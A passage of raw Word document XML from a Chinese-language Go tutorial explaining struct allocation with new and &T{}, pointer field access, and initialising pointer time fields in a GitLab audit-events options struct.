      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>函数给一个新的结构体变量分配内存，它返回指向已分配内存的指针：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>var t *T = new(T)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6818E2AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t := new(T)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD07BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>特别的：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">t := &amp;T{} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>等效于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>new(T)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE2E3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>p2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> := new(Person) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A06819" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">p2.name = "lisi" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C658D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">p2.age = 20 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A9D5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">(*p2).age = 23 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368435FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>这种写法也是合法的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>，可以模仿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>中的指针使用，也可以直接不用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>访问成员变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0917AA50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>fmt.Printf("This is %s, %d years old\n", p2.name, p2.age)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED8784" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1274C599" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>第三种，使用字面量初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CD2EC3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t := T{a, b}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87C0CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FCBA76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面例子的第二种情况，虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> p2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指针类型，但我们仍然可以像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> p2.age = 23 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样赋值，不需要像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> C++ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中那样使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">,Go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会自动进行转换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A250C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意也可以先通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作符来获取指针所指向的内容，再进行赋值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(*p2).age = 23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BC1194" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FB3AE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E0F651E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA7088A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="_Toc159779766"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的指针简单理解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w14:paraId="05FF6B68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C81D05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的时候，不论是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> []*Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的写法还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> []Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E110C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B0D719" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指针，可以直接更改数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38967A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值可以是指针或者数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1893C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112A7E25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是取数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2635FF86" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0098865C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构中某个值，指针或者正常值利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接取，没区别，也不用特地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76672041" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4D5D97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针变量初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C5886" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要么直接初始化，要么声明后再初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ACF176" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B7FB1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如某代码声明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E292057" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type ListAuditEventsOptions struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA61CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ListOptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116D828" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>CreatedAfter  *time.Time `url:"created_after,omitempty" json:"created_after,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F327A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>CreatedBefore *time.Time `url:"created_before,omitempty" json:"created_before,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F031C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B2C016" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7180048D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="OLE_LINK38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明方法一：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="308"/>
    <w:p w14:paraId="573B791A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t := time.Now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA1B93B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>opt := &amp;gitlab.ListAuditEventsOptions{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4BDDA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ListOptions:   gitlab.ListOptions{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B834BF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CreatedAfter:  &amp;t,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27067669" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>CreatedBefore: &amp;time.Time{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF963CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23767828" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EC515A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明方法二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF9B3BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>opt := &amp;gitlab.ListAuditEventsOptions{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70ABBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ListOptions:   gitlab.ListOptions{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2978F183" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CreatedAfter:  new(time.Time),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD5FA7F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>CreatedBefore: &amp;time.Time{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF78DAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A037194" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6129101B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明方法三：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5BD7BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>opt := &amp;gitlab.ListAuditEventsOptions{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01705823" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>ListOptions:   gitlab.ListOptions{},</w:t>
      </w:r>
    </w:p>
